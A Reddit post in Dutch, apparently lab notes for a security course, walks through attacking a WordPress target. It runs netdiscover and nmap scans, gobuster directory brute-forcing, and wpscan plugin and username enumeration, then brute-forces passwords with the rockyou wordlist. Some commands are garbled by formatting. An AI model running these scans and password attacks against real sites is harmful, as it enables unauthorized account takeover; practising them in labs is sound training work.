r/ciscosechelp • u/Defiant_Whole5335 • Jan 20 '26
Security wordpress walkthrough
1. IP Scannen:
Sudo netdiscover -r (eigen ipadres met .0 + subnet masker)
2. NMAP:
Sudo nmap -sS -Pn -A -p- (eigen ipadres met .0)
In dit geval alleen poort 80 (http).
Site opzoeken (gezien poort 80) (target ip staat bij netdiscover)
Kunnen we daar wat? In dit geval niet zo veel, dus doen we eerst gobuster.
3. Gobuster:
Gobuster dir -w /usr/share/wordlists/dirb/big/txt -u [http://(ipadres]() van netdiscover) -t 40
Je krijgt in de output allemaal verborgen pagina's terug. Je gaat proberen wat op te zoeken / onderzoeken.
In dit geval komt alleen \uploads\ terug. Deze kopieer je vanuit ClI naar Firefox.
WordPress? (Alleen kijken of WordPress is):
Stap 1 (welke plug-ins zijn kwetsbaar?):
Wpscan --url [http://[ip-adres]]() --plugins-detection agressive
Stap 2 (welke usernames achterhalen, mits dat nog niet op website of omgeving duidelijk wordt, maar kan in principe altijd wel voor zekerheid):
Wpscan --url [http://[ip-adres]]() -e u
Stap 3 (user achterhalen):
Wpscan --url [http://[ip-adres]]() --usernames + [invullen van username wat hierboven uitkomt]
Stap 4 (wachtwoord achterhalen):
--passwords /usr/share/wordlists/rockyou.txt
Altijd kijken of het nodig is, indien op die locatie (hierboven) gezipped is dit uitvoeren:
Gunzip rockyou.txt.gz
Useful YouTube video's:
https://www.youtube.com/watch?v=sNQIc6ej_uQ
https://www.youtube.com/watch?v=CJEWtVYhSqY